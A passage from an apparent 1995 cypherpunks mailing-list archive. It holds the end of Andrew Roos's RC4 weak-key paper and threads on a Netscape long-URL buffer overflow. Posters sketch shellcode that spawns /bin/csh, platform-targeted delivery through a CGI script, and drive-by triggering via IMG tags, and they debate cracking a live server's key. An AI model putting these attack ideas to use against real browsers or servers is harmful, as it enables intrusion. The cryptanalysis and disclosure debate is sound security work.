non-linear process which is hard to analyze. However, when dealing with the first few elements of the state table, there is a high probability that the byte with which the element is swapped has not itself been involved in any previous exchanges, and therefore retains its initial value {0,1,2,...,255}. Similarly, when dealing with the first few elements of the state table, there is also a significant probability that none of the state elements added to index2 in line 6 of the algorithm has been swapped either. This means that the most likely value of an element in the state table can be estimated by assuming that state[x] == x in the algorithm above. In this case, the algorithm becomes: 1 index1 = 0; 2 index2 = 0; 3 4 for(counter = 0; counter < 256; counter++) 5 { 6 index2 = (key_data_ptr[index1] + counter + index2) % 256; 7 state[counter] = index2; 8 index1 = (index1 + 1) % key_data_len; 9 } Which can be reduced to: B. The most likely value for element E of the state table is: S[E] = X(E) + E(E+1)/2 where X(E) is the sum of bytes 0..E (inclusive) of the key. (when calculating the sum of key elements, the key is considered to "wrap around" on itself). Given this analysis, we can calculate the probability for each element of the state table that it's value is the "most likely value" of B above. The easiest way to do this is to evaluate the state tables produced from a number of pseudo-randomly generated RC4 keys. The following table shows the results for the first 47 elements from a trial of 100 000 eighty-bit RC4 keys: Probability (%) 0-7 37.0 36.8 36.2 35.8 34.9 34.0 33.0 32.2 8-15 30.9 29.8 28.5 27.5 26.0 24.5 22.9 21.6 16-23 20.3 18.9 17.3 16.1 14.7 13.5 12.4 11.2 24-31 10.1 9.0 8.2 7.4 6.4 5.7 5.1 4.4 32-39 3.9 3.5 3.0 2.6 2.3 2.0 1.7 1.4 40-47 1.3 1.2 1.0 0.9 0.8 0.7 0.6 0.6 The table confirms that there is a significant correlation between the first few values in the state table and the "likely value" predicted by B. 3. WEAK KEYS The RC4 state table is used to generate a pseudo-random stream which is XORed with the plaintext to give the ciphertext. The algorithm used to generate the stream is as follows: x and y are initialized to 0. To generate each byte: 1 x = (x + 1) % 256; 2 y = (state[x] + y) % 256; 3 swap_byte(&state[x], &state[y]); 4 xorIndex = (state[x] + state[y]) % 256; 5 GeneratedByte = state[xorIndex]; One way to exploit our analysis of the state table is to find circumstances under which one or more generated bytes are strongly correlated with a small subset of the key bytes. Consider what happens when generating the first byte if state[1] == 1. 1 x = (0 + 1) % 256; /* x == 1 */ 2 y = (state[1] + 0) % 256; /* y == 1 */ 3 swap_byte(&state[1], &state[1]); /* no effect */ 4 xorIndex = (state[1] + state[1]); /* xorIndex = 2 */ 5 GeneratedByte = state[2] And we know that state[2] is has a high probability of being S[2] = K[0] + K[1] + K[2] + 2 (2+1) / 2 Similarly, S[1] = K[0] + K[1] + 1 (1+1) / 2 So to make it probable that S[1] == 1, we have: K[0] + K[1] == 0 (mod 256) In which case the most likely value for S[2] is: S[2] = K[2] + 3 This allows us to identify a class of weak keys: C. Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a significant probability that the first byte generated by RC4 will be K[2] + 3 (mod 256). Note that there are two special cases, caused by "unexpected" swapping during key generation. When K[0]==1, the "expected" output byte is k[2] + 2, and when k[0]==2, the expected value is k[2] + 1. There are a number of similar classes of "weak keys" which only affect a few keys out of every 65536. However the particular symmetry in this class means that it affects one key in 256, making it the most interesting instance. Once again I took the easy way out and used simulation to determine the approximate probability that result C holds for any given key. Probabilities ranged between 12% and 16% depending on the values of K[0] and K[1], with a mean of about 13.8%. All these figures are significantly greater than the 0.39% which would be expected from an uncorrelated generator. The key length used was again 80 bits. This works the other way around as well: given the first byte B[0] generated by a weak key, the probability that K[2]==B[0]-3 (mod 256) is 13.8%. 4. EXPLOITING WEAK KEYS IN RC4 Having found a class of weak keys, we need a practical way to attack RC4 based cryptosystems using them. The most obvious way would be to search potential weak keys first during an exhaustive attack. However since only one in every 256 keys is weak, the effective reduction in search space is not particularly significant. The usefulness of weak keys does increase if the opponent is satisfied with recovering only a percentage of the keys subjected to analysis. Given a known generator output which includes the first generated byte, one could assume that the key was weak and search only the weak keys which would generate the known initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance that the assumed value of K[2] will be correct, there is only a 0.054% chance of finding the key this way. However, you have reduced the search space by 16 bits due to the assumed relationship between K[0] and K[1] and the assumed value of K[2], so the work factor per key recovered is reduced by a factor of 35, which is equivalent reducing the effective key length by 5.1 bits. However in particular circumstances, the known relationships between weak keys may provide a much more significant reduction in workload. The remainder of this section describes an attack which, although requiring very specific conditions, illustrates the potential threat. As a stream cipher, a particular RC4 key can only be used once. When multiple communications sessions are required, some mechanism must be provided for generating a new session key each time. Let us suppose that an implementation chose the simple method of incrementing the previous session key to get the new session key, and that the session key was treated as a "little endian" (least significant byte first) integer for this purpose. We now have the interesting situation that the session keys will "cycle through" weak keys in a pattern which repeats every 2^16 keys: 00 00 00 ... Weak (510 non-weak keys) FF 01 00 ... Weak (254 non-weak keys) FE 02 00 ... Weak (254 non-weak keys) FD 03 00 ... Weak ... 01 FF 00 ... Weak (254 non-weak keys) 00 00 01 ... Weak (510 non-weak keys) FF 01 01 ... Weak (Least significant byte on the left) Now while an isolated weak key cannot be identified simply from a known generator output, this cycle of weak keys at known intervals can be identified using statistical techniques since each of the weak keys has a higher than expected probability of generating the _same_ initial byte. This means that an opponent who knew the initial generated bytes of about 2^16 session keys could identify the weak keys, and would also be able to locate the 510-key gap between successive cycles of weak keys (although not precisely). Since the 510-key gap occurs immediately following a key which begins with 00 00, the opponent not only knows that the keys are weak, but also knows the first two bytes of each key. The third byte of each key can be guessed from the first output byte generated by the key, with a 13.8% chance of a correct guess. Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the attacker can search a key space which is 24 bits less than the size of the session keys, with a 13.8%/8 chance of success, effectively reducing the key space by approximately 18 bits. Although this particular attack depends on a very specific set of circumstances, it is likely that other RC4 based cryptosystems in which there are linear relationships between successive session keys could be vulnerable to similar attacks. 5. RECOMMENDATIONS The attacks described in this algorithm result from inadequate "mixing" of key bytes during the generation of the RC4 state table. The following measures could be taken to strengthen cryptosystems based on the RC4 algorithm: (a) After initializing the algorithm, generate and discard a number of bytes. Since the algorithm used to generate bytes also introduces additional non-linear dependencies into the state table, this would make analysis more difficult. (b) In systems which require multiple session keys, ensure that session keys are not linearly related to each other. (c) Avoid using the weak keys described. 6. CONCLUSION This preliminary analysis of RC4 shows that the algorithm is vulnerable to analytic attacks based on statistical analysis of its state table. It is likely that a more detailed analysis of the algorithm will reveal more effective ways to exploit the weaknesses described. Andrew Roos _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From rsalz at osf.org Fri Sep 22 10:04:27 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 22 Sep 95 10:04:27 PDT Subject: Defense against a class of programming bugs Message-ID: <9509221703.AA22917@sulphur.osf.org> In light of the continuing vulnerability to long user input, I humbly offer the following aphorism, suitable for display on all Netscape programmer cubicles: Copy strings with strdup, not strcpy. From yihchun at u.washington.edu Fri Sep 22 10:04:56 1995 From: yihchun at u.washington.edu (Yih-Chun Hu) Date: Fri, 22 Sep 95 10:04:56 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: On Fri, 22 Sep 1995, Dietrich J. Kappe wrote: > Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try > it out, I've put up a simple page with the url at > Netscape, Windows (its a school computer) works fine w/ a proxy. When there is no proxy, Windows dies. EMM dies. Lots of stuff dies. So use a proxy. > http://www.redweb.com/experiment/bug.html > > *warning* view the source before you click on strange links!!! Sometimes you won't expect it, ie for netscape enhancements click here (or on the Netscape logo). +---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+ | http://www.cs.washington.edu/homes/yihchun yihchun at cs.washington.edu | | http://weber.u.washington.edu/~yihchun yihchun at u.washington.edu | +---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+ | 1024/E50EC641 B2 A0 DE 9E 36 C0 EB A6 F9 3E D2 DD 2F 27 74 79 | | 2047/DF0403F9 18 EB 62 C8 7F 06 04 67 42 76 24 E2 99 D1 07 DC | +--------------------------------------------------------------------------+ From rjc at clark.net Fri Sep 22 10:14:04 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 10:14:04 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com> Message-ID: <199509221713.NAA11980@clark.net> Perry writes: > > These buffer overflow bugs should be taught in every programming > > 101 course along with fencepost errors. > > > > I'm not even sure if I want to write the obligatory program to exploit > > the hack given that some malicious jerk would probably use it > > on his home page to attack people. > > The problem is that if you don't produce a (benign) exploit people > aren't going to take it seriously enough. Yeah, I guessed that. I'll work on it, I have a few doubts I have to research first. For instance, how to embed code in the domain that 1) server/client processing won't "cook" and 2) contains no isolated zero bytes which would null terminate the string. My current idea is to look in Netscape for an "exec" routine, and call it passing a "/bin/csh" to it. Irregardless, it's a nasty bug given that you can crash anyone's netscape. And on Mac/Win3.1, it may even require a reboot. -Ray From tedwards at Glue.umd.edu Fri Sep 22 10:18:08 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Fri, 22 Sep 95 10:18:08 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: On Fri, 22 Sep 1995, Dietrich J. Kappe wrote: > Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try > it out, I've put up a simple page with the url at > http://www.redweb.com/experiment/bug.html Netscape also crashes (error 1) on regular Macs...sigh. I'm contacting someone who just wrote a http server to see how tough it would be drop some code on the stack. -Thomas From ab411 at detroit.freenet.org Fri Sep 22 10:20:35 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Fri, 22 Sep 95 10:20:35 PDT Subject: (noise) Subject: Married with Children (was: Re: Netscape closes up 1 3/8 today!) Message-ID: <199509221720.NAA17055@detroit.freenet.org> -----BEGIN PGP SIGNED MESSAGE----- Christopher J. Shaulis writes: > Yeah. Thats the way it works sometimes. I remember back when that > housewife from minnasota launched her media campaign to have "Married > With Children" taken off the air. All it did was make the show a > hundred times more popular and extend its life for years after it > probably would have been canceled on its own. Terry Rakolta is from Bloomfield Hills, Michigan, just a few short miles from where I sit, typing at my keyboard. After being offended by the episode "Her Cups Runneth Over", Rakolta took notes on things she found offensive in subsequent episodes and then mailed a complaint to Fox. Fox's reaction? According to executive producer Michael Moye, "Everybody did the manly thing which was immediately dive behind desks and point the finger at us. You couldn't get your legs under a desk for all the executives under there. You have never seen such wussing. And we're going, 'One letter? *One letter?*'" [emphasis his] The resulting media incident almost certainly increased the show's ratings, but it also brought the wrath of the Fox censor down on the producers. For an interesting account of this, see Playboy, July 1990, (the one with Sharon Stone topless on the cover ;), "Hanging out with the Bundys", Pamela Marin, p.114 et seq. Something else which has happened here in the Greater Detroit SMSA, just in the last few days, is the mother of a ten year old boy has demanded that _The_Stand_ by Stephen King be removed from the school's library after her son checked it out from said library. Turns out Stephen included some graphic descriptions of sex. The punch line, if you like, is that in tv news coverage the young lad was shown sitting in front of the tv, playing a Mario-like video game. Thank God they got that book away from him just in the nick of time, eh? He might be reading even as we speak! They walked still further and the girl said, "Is it true that long ago firemen put fires *out* instead of going to start them?" "No." -- Ray Bradbury ``Officer, officer, arrest that man! He's whistling a dirty song.'' -- Jean Ellison Crypto relevance? None. drc -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGLunREcrOJethBVAQFnbwP/SI1df4BtSIOZryK+pcoatMy7jePQQF4W fj6cONy6ulf/0KqswS1md91qZMUKJ0EpCJGf+qbaXTblASCZ08spGlgZ3rp0yYiK wGlWEHxatgqbrSO6XKJAEAIccd2aArtpnWPBfnnXpCGaSXQ4lLrg+/a3b+q9JZ9m BvLSyhaTqkM= =Ijia -----END PGP SIGNATURE----- -- David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad Hardware & Software Committee -- Finger conrad at grfn.org for public key Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From mjsus at atlanta.com Fri Sep 22 10:23:09 1995 From: mjsus at atlanta.com (mjsus at atlanta.com) Date: Fri, 22 Sep 95 10:23:09 PDT Subject: business intelligence or BI Message-ID: <199509221726.NAA17033@atlanta.com> >It's important here to distinguish economic "espionage" and economic >"intelligence." > There is also the difference between the business intelligence and business espionage ! The business intelligence is used to collect, evaluate, analyze etc. the business information and data that may include competitors, markets, economic trends, suppliers among others. The sources of this information are publicly and legally available for all companies and individuals. The formal or informal business intelligence system can be used. The successful use of the traditional business intelligence will result in the best results, when this information and data is eveluated, analyzed and disseminated in the most intelligent, reliable, timely and accurate manner. 100% of companies are already using the business intelligence (all companies are just not calling it the BI): some more successfully than others. The business intelligence can be used both for strategic and tactical purposes. Regards, Mark From ab411 at detroit.freenet.org Fri Sep 22 10:24:42 1995 From: ab411 at detroit.freenet.org (David R. Conrad) Date: Fri, 22 Sep 95 10:24:42 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221724.NAA18084@detroit.freenet.org> -----BEGIN PGP SIGNED MESSAGE----- Jeff Weinstein writes: > Not that I want to divert attention away from netscape(OK, maybe I > do :-) ), but does this bug exist in any other common browser? Lynx can handle it on the info page (reached by pressing '='), but: In response to selecting the long domain name found in the Warning link in http://www.grfn.org/~conrad/test.shtml, lynx replied: - - - Sorry, you have encountered a bug in Lynx Ver. 2-4-2 Please send a concise mail message to lynx-bug at ukanaix.cc.ukans.edu describing what you were doing, the URL you were looking at or attempting to access, your operating system name with version number, the TCP/IP implementation that your system is using, and any other information you deem relevant. Do not mail the core file if one was generated. Lynx now exiting with signal: 11 Exiting via interrupt: exit(0) - - - [No core file was generated] My system is: (uname -a) Linux russell 1.3.26 #2 Thu Sep 14 08:34:38 EDT 1995 i486 Netscape 1.1N for linux crashed in a way that locked my system up, and caused endless trashing. I had to reboot, but my filesystem was undamaged. Not sure why it crashed and burned on my system while others have gotten such nice SegVs and core files. I guess I managed to get just the right (wrong) thing onto the stack. :-) :-( (P.S. Whoops, just realized that I rebooted with a different kernel; Lynx did indeed crash under 1.3.26 (post-reboot), but Netscape crashed under 1.2.13 (pre-reboot). Pardon me if I don't re-try under 1.3.26, but having X lock up and hearing my disk trash is not something I relish.) drc -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGLu1BEcrOJethBVAQEhwwP/cPZ2Gr/MClaywXEAtagNa7n5IyIsqFGI LmCDxjTMdK/zXzuPcU3Xa53QxOn4dSxQv2PRKHrLGSrVn5vvZHRiYmH5z4NgWvmJ ETFlFascANzqN2VbHgrn80u3RlFIH0UAUiTgoIFiJ4E3TUzrmt5w4qeXxvfA9PKQ LQi2oeIArS8= =EEup -----END PGP SIGNATURE----- Last line above should read: "hearing my disk *thrash* ...," not trash. Signing messages is non-trivial with my current set up, so I don't feel like re-doing it for such a minor glitch. -- David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad Hardware & Software Committee -- Finger conrad at grfn.org for public key Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 No, his mind is not for rent to any god or government. From rjc at clark.net Fri Sep 22 10:29:48 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 10:29:48 PDT Subject: YET ANOTHER BAD NETSCAPE BUG (no it isnt!) Message-ID: <199509221729.NAA16470@clark.net> Just another reminder that the second bug I posted about was a fluke on my system and not a real bug. I'm hoping that putting the reminder in the subject will stop people from forwarding it on to other lists before reading the retraction. Although this was a false bug, the overflow bug is very real and verified. -Ray From jsimmons at goblin.punk.net Fri Sep 22 10:32:29 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Fri, 22 Sep 95 10:32:29 PDT Subject: Netscape for Linux? In-Reply-To: <43tmht$qfe@tera.mcom.com> Message-ID: <199509221728.KAA07352@goblin.punk.net> > > In article <199509212125.RAA00188 at hoopsnake.cjs.net>, cjs at netcom.com (Christopher J. Shaulis) writes: > > And the sad part is that now that they have announced that they are > > dropping their unofficial Linux support, I really want to hurt > > Netscape badly. > > This is news to me. We have engineers spending valuable time keeping > our linux port running. If you tell me where you saw this, I will look > into it. > > --Jeff > I, and many other Linux users that I know, have repeatedly contacted Netscape offering to pay for a Linux version of Navigator - we have usually been either 'brushed off' or completely ignored. And now there is no mention of a Linux port of v2.0 - not surprising that this 'rumor' is running around. I think a statement by you or someone else at Netscape supporting a Linux version would go a long way in reassuring the Linux community, even if it's something that is going to take a while. And you might want to drop by the usenet comp.os.linux.* hierarchy - they're already working on ways to use your html extensions to design web pages that can't be read by Navigator ... -- Jeff Simmons jsimmons at goblin.punk.net From goedel at tezcat.com Fri Sep 22 10:38:08 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Fri, 22 Sep 95 10:38:08 PDT Subject: Netscape bug and the IMG tag. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- You can plunk a nasty url into the SRC field of an IMG tag, thus eliminating the need for clicking on the offending url. Also, it makes it harder to check the html of a page. Check out http://www.redweb.com/experiment/bug2 html if you feel like rebooting. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMGMCc3If3YegbdiBAQFTMgJYsAEPkSWTtGDswAYpT1repQjd8n3unMg3 CIXNlxmg43BkMgyNRrqYP2P61aMJt4FwPZt+PgE4NYxVj6PzaPtsf/Y/6BSsWNxb cKcr =/ORS -----END PGP SIGNATURE----- Dietrich Kappe | Red Planet http://www.redweb.com Red Planet, LLC| "Chess Space" | "MS Access Products" | PGP Public Key 1-800-RED 0 WEB| /chess | /cobre | /goedel/key.txt Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84 From akjoele at shiva.ee.siue.edu Fri Sep 22 10:42:02 1995 From: akjoele at shiva.ee.siue.edu (Arve Kjoelen) Date: Fri, 22 Sep 95 10:42:02 PDT Subject: XDM has the same problem as netscape ?! Message-ID: <199509221741.MAA27447@shiva.ee.siue.edu> Ian Goldberg wrote: >Nelson Minar wrote: >>Last time I looked, the MIT-MAGIC-COOKIE-1 scheme used in X11R4 had >>the same problem: the random seed was based on the current time to the >>microsecond, modulo the granularity of the system clock. I think I >>figured that on my hardware, if I could figure out which minute the X >>server started (easy with finger), I'd only have to try a few >>thousand keys or so. Caveat: I never actually proved the idea. >Wow. I just checked, and Nelson's right. >[ code extracts snipped] I just checked X11R6, and the same method is used there, so it hasn't changed since X11R4. -Arve. From somogyi at digmedia.com Fri Sep 22 10:45:53 1995 From: somogyi at digmedia.com (Stephan Somogyi) Date: Fri, 22 Sep 95 10:45:53 PDT Subject: "Gnusaic"? Why not a Gnu-Style Web Browser? Message-ID: At 23:23 21.9.95, Alex Tang wrote: > Yes. This has been done. A set of patches for NCSA's HTTPd (for US > folks only) can be found at > > http://petrified.cic.net/~altitude/ssl/howto.html > > I got the patches from the ssleay gang in AU, but i haven't seen them on > their ftp site yet, so if you're outside the states, it'll be available > rsn (i think...) Has anyone already created the necessary patches for Apache , or does anyone know whether the Apache dev team would be amenable to including conditional directives to allow the build of a secure version? If anyone is thinking of making the effort to create a publicly available secure server, Apache's probably the best source base to work with. ________________________________________________________________________ Stephan Somogyi Think Tank Grenadier Digital Media From frissell at panix.com Fri Sep 22 10:56:39 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 22 Sep 95 10:56:39 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221756.NAA15178@panix.com> At 01:17 PM 9/22/95 -0400, Thomas Grant Edwards wrote: >On Fri, 22 Sep 1995, Dietrich J. Kappe wrote: > >> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try >> it out, I've put up a simple page with the url at >> http://www.redweb.com/experiment/bug.html > >Netscape also crashes (error 1) on regular Macs...sigh. I'm contacting >someone who just wrote a http server to see how tough it would be drop >some code on the stack. > >-Thomas On my 486 running Windoze for Workgroups 3.11 and the latest Netscape Beta it causes Netscape to die but doesn't lock me up. Generally I've found Netscape blows up in a much firendlier way than other Windoze programs. I can often recover the Netscape session itself and it doesn't lock me up as much. DCF > > > From ghio at utopia.hacktic.nl Fri Sep 22 10:59:07 1995 From: ghio at utopia.hacktic.nl (Matthew Ghio) Date: Fri, 22 Sep 95 10:59:07 PDT Subject: Crypto Sync Issue In-Reply-To: <199509191846.LAA24272@netcom4.netcom.com> Message-ID: Tom Rollins wrote: > I am interested in encrypting a SLIP link between my > PC (running Linux) and my Netcom shell account (running > SLIRP). > > My question has to do with error conditions on the line. > If I drop a character or packet, the two sides will loose > crypto sync and result in things scrambled from then on. > The modems will fix most of the low level problems. > However, Murphy's Law has not been repealed. :) > > Are there any standard methods to provide the SYNC between > the sender(encryption) and the receiver(decryption) on > an Async connection ? > > Since Slip uses IP packets, I was planning on an encryption > of the data portion of the IP packets (leaving the header > alone). A better approach would be to encrypt the entire IP packets and leave the framing bytes alone. But this is what I do: I use regular unencrypted SLIP (slirp) between here and netcom. Also install copies of slirp in all your other unix accounts, plus your favorite session encryption daemon (deslogin, ctcp, ssh, esm, etc). Then make some script files like this. For this example I use deslogin to establish a secure session with utopia.hacktic.nl. /root/dialup: #!/bin/csh dip /root/netcom.dip /sbin/agetty 38400 ttyqf -l /root/utopiadeslogin & dip /root/utopia.dip /root/utopiadeslogin: #!/bin/csh exec /usr/local/bin/deslogin ghio at utopia.hacktic.nl /root/utopia.dip: port ptyqf wait ogin: 60 send anything\n wait d: 5 send password\n wait ] 5 send \n send exec slirp-0.9o/src/slirp\n get $rmtip 10.0.2.42 get $locip 10.0.2.16 mode CSLIP Add to /etc/hosts: 10.0.2.42 utopia-secure Then I can do: telnet utopia-secure and everything is encrypted. I got deslogin from utopia's anon-ftp dir. A 3DES version would be nice tho. When you want to hangup, use this to kill all of the dip processes: #!/bin/csh ps -ua|grep " pQf "|awk '{print "kill " $2}'|csh ps -ua|grep " pS1 "|awk '{print "kill " $2}'|csh To do this for more hosts, just pick any available IP addresses in 10.0.2.x and a free tty (ttyq* are usually unused). From lethin at ai.mit.edu Fri Sep 22 11:13:25 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Fri, 22 Sep 95 11:13:25 PDT Subject: Worms and New Netscape Bug Message-ID: <199509221813.OAA10129@grape-nuts.ai.mit.edu> Although Netscape will certainly fix their new bugs, it's likely that many old copies will remain on computers on the net, and the holes will remain. Netscape could "fight" against this with a modified worms/webcrawler which looks for blatantly dangerous domain names in URLs and reports them to "CERT" or blockware companies like Surfwatch. For example, they'd find the foo* link at the bottom of My page Not a complete solution obviously (e.g. the server could selectively reply to requests, and hide from the webcrawler IP). What happens when someone using the AOL browser clicks on one of these HREF's... does it crash all of AOL? --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm. 610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 From sameer at c2.org Fri Sep 22 11:28:44 1995 From: sameer at c2.org (sameer) Date: Fri, 22 Sep 95 11:28:44 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221713.NAA11980@clark.net> Message-ID: <199509221823.LAA19265@infinity.c2.org> Suggestion: Once you figure out how to exploit it for a particular platform write a cgi-script which checks the USER_AGENT (or whatever it is called) environment variable to make sure the netscape that has reached your exploit is the same platform as the exploit was written for. > > Perry writes: > > > These buffer overflow bugs should be taught in every programming > > > 101 course along with fencepost errors. > > > > > > I'm not even sure if I want to write the obligatory program to exploit > > > the hack given that some malicious jerk would probably use it > > > on his home page to attack people. > > > > The problem is that if you don't produce a (benign) exploit people > > aren't going to take it seriously enough. > > Yeah, I guessed that. I'll work on it, I have a few doubts I have > to research first. For instance, how to embed code in the domain that > 1) server/client processing won't "cook" and 2) contains no isolated > zero bytes which would null terminate the string. > > My current idea is to look in Netscape for an "exec" routine, > and call it passing a "/bin/csh" to it. > > Irregardless, it's a nasty bug given that you can crash anyone's > netscape. And on Mac/Win3.1, it may even require a reboot. > > -Ray > > > > > > > > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From koontz at MasPar.COM Fri Sep 22 11:51:21 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Fri, 22 Sep 95 11:51:21 PDT Subject: Project: a standard cell random number generator Message-ID: <9509221852.AA23179@argosy.MasPar.COM> >At 02:50 PM 9/20/95 -0700, you wrote: >> In this sense, NSA ought to be *encouraging* Intel and >>IBM and Motorola to put "generate random bits" instructions into >>their instruction sets... Intel produces a random generator (in a chip package) that is used in STU-II..'s. You can't buy such devices, random sources good enough to be used for initialization for military grade cryptography are Controlled Cryptographic Items. One would think that the NSA is attempting to exploit the lack of availability of random initialization values against their targets. The question becomes one of whether or not the general populace (of the U.S.) is considered a potential target, or simply casualties of the situation in undeclared hostilities. As a minimum one could infer that the availability of random numbers is considered quite important for NSA secure communications. I used to work at a company that subscribed to NSA (National Standards Association) which provided government and other standards on microfiche and/or hardcopy. There was an interval before Reagan took office when the NSA provided all of their unclassified standards into general availability, an era of open- ness that came to an end with the Star Wars era. One of those standards was for random data sources. The only recent standards that come to mind are the X.509 stuff for session key generation, FIPS PUB 140-1 which describes randomizer tests, and the recent FIPS PUB for a password generator. These three use block ciphers to produce psuedo-random output. If NSA requires real stochastic results for military crypto, what would we as casual cryptographers feel comfortable with? The Netscape episode shows the comfort level needs improving. How good is good enough? From microbody at wirepool.ruhr.de Fri Sep 22 12:06:19 1995 From: microbody at wirepool.ruhr.de (Matthias Jordan) Date: Fri, 22 Sep 95 12:06:19 PDT Subject: Netscape sub rosa? In-Reply-To: Message-ID: <5uIxesBWJ2B@blank.wirepool.ruhr.de> Hello, Tim! > Gee, where's that "Cypherpunks logo" when you really need it? > > A rose covering the Netscape "N" logo? A crypto eagle swooping down and > pecking at weak keys? How about an anarchism-A (an A in i circle) whith the circle not being totally closed thus describing a C? CU! /\/\icroBod\/ |\?/| SoziBits <---- Anschlaege Drogen Waffen / \______/ | I | Falken im Netz RAF ETA KGB LSD XTC BND ^ PGP2.3a key per EmpfBest. --- Frag' mich nach PGP -- Wer vom Kapitalismus nicht reden will, sollte vom Faschismus schweigen From alt at iquest.net Fri Sep 22 12:10:46 1995 From: alt at iquest.net (Al Thompson) Date: Fri, 22 Sep 95 12:10:46 PDT Subject: The Next Hack Message-ID: At 05:01 AM 9/22/95 -0400, Futplex wrote: >sameer writes: >> 2) Organize a net-wide search over the space of the RNG seed to >> crack the private key of some well known secure server. >> >> 3) Release the private key to the net. > >FWIW, for the record, I'm uncomfortable with this. It sounds unethical, IMHO. > >For me at least, targeting the key of some particular server that happens to >be out there is over the line. > >If you said you would have someone volunteer a supposedly secure server for >the challenge, I'd have no qualms. I might disagree with the part about releasing it to the net, but I don't disagree with targeting a server which is claimed to be "secure." Why? Nobody would have been too upset or surprised if someone had built the Titanic for the sole purpose of trying to sink it. It only made waves (pun alert) because it was claimed to be "unsinkable" (secure), but sank anyway. Maybe a good tactic would be to crack a "secure" server, and send the results ONLY to the server operators, along with a description of machine-time involved. Put out a public press release, describing the machine-time involved, how it was possible due to weak crypto imposed by the government, and the possible economic and commercial implications of said weak crypto. From jsimmons at goblin.punk.net Fri Sep 22 12:21:44 1995 From: jsimmons at goblin.punk.net (Jeff Simmons) Date: Fri, 22 Sep 95 12:21:44 PDT Subject: Netscape for Linux Message-ID: <199509221917.MAA07561@goblin.punk.net> Found this on Comp.os.linux.misc - hope it's true: Tobias Engel writes: >I looked at the Data Sheet-Page for the Netscape Navigator 2.0 today (http://home.netscape.com/comprod/products/navigator/version_2.0/datasheet.html). >There is a "Supported Platforms"-List at the end of the Page. For Unix it >says: >--- >Digital Equipment Corp. Alpha (OSF/1 2.0) >Hewlett-Packard 700-series (HP-UX 9.03) >IBM RS/6000 AIX 3.2 >Silicon Graphics (IRIX 5.2) >Sun SPARC (Solaris 2.4, SunOS 4.1.3) >386/486/Pentium (BSDI) >--- >So, where is Linux??? In comp.infosystems.www.browsers.x Jamie Zawinski said that there *will* be a 2.0 version for Linux. He also explained why Linux isn't listed and why Netscape will tell you that there will not be a supported version of Netscape for Linux. This is a copy of that article, which is worth reposting here, I think, because of the large threads about this subjects: From: Jamie Zawinski Newsgroups: comp.infosystems.www.browsers.x Subject: Re: Netscape 2.0 for Linux Organization: Netscape Communications Date: Wed, 20 Sep 1995 16:11:19 -0700 Marco Trincardi wrote: > > There will be a Linux version of the new upcoming Netscape 2.0 ??? > At Netscape HomePage i didnt find usefull info. And I replied: > > Yes, once 2.0 is released (please don't ask me when) it will be > available for all platforms on which 1.1 is available. Since then, it would seem that some folks have called our customer support lines and gotten a seemingly different answer, so allow me to clarify: When someone in customer support tells you "we will not be supporting Linux in Netscape 2.0," they're right: but that's because we didn't support it in 1.0 or 1.1 either. "Support" means we sell the software, and you can buy a support contract. This is not, and has never been the case for Linux. You have never been able to get a *supported* version of Netscape Navigator for Linux. We have no Linux *product*; our sales and support folks don't deal with it in any way, and never have. However, there has been an unsupported educational/evaluation version available for that platform, and this will also be the case for 2.0. -- Jamie Zawinski jwz at netscape.com http://www.netscape.com/people/jwz/ -- -- Jos Vos -- X/OS Experts in Open Systems BV | Phone: +31 20 6938364 -- Amsterdam, The Netherlands | Fax: +31 20 6948204 -- Jeff Simmons jsimmons at goblin.punk.net From adam at homeport.org Fri Sep 22 12:27:31 1995 From: adam at homeport.org (Adam Shostack) Date: Fri, 22 Sep 95 12:27:31 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com> Message-ID: <199509221927.PAA16372@homeport.org> Perry E. Metzger wrote: | I don't believe the Sun Java stuff would suffer from it, although I | fear Java a great deal. I keep hearing this thought. Isn't Win95 with its 